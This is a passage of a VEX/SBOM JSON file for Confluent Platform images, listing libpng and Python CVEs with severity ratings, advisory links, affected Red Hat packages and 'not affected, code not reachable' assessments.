          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34757"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34757"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/836"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/837"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00017.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8251-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8639-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34757"
        }
      ],
      "published": "2026-04-09T15:16:11+00:00",
      "updated": "2026-06-17T10:39:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3479",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        22
      ],
      "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3479"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3479"
        },
        {
          "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe"
        },
        {
          "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943"
        },
        {
          "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c"
        },
        {
          "url": "https://github.com/python/cpython/issues/146121"
        },
        {
          "url": "https://github.com/python/cpython/pull/146122"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
        }
      ],
      "published": "2026-03-18T19:16:06+00:00",
      "updated": "2026-06-17T10:43:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3644",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        116
      ],
      "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3644"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/3974092b037f9a3b000fb15b48ea61ce3b25d330"
        },
        {
          "url": "https://github.com/python/cpython/commit/556aa098e738b127c714866f819b4abe2f7593d8"
        },
        {
          "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/dae4b1a21f8df4570e30986affd61bbe4ade4cef"
        },
        {
          "url": "https://github.com/python/cpython/issues/145599"
        },
        {
          "url": "https://github.com/python/cpython/pull/145600"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3644.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
        }
      ],
      "published": "2026-03-16T18:16:09+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
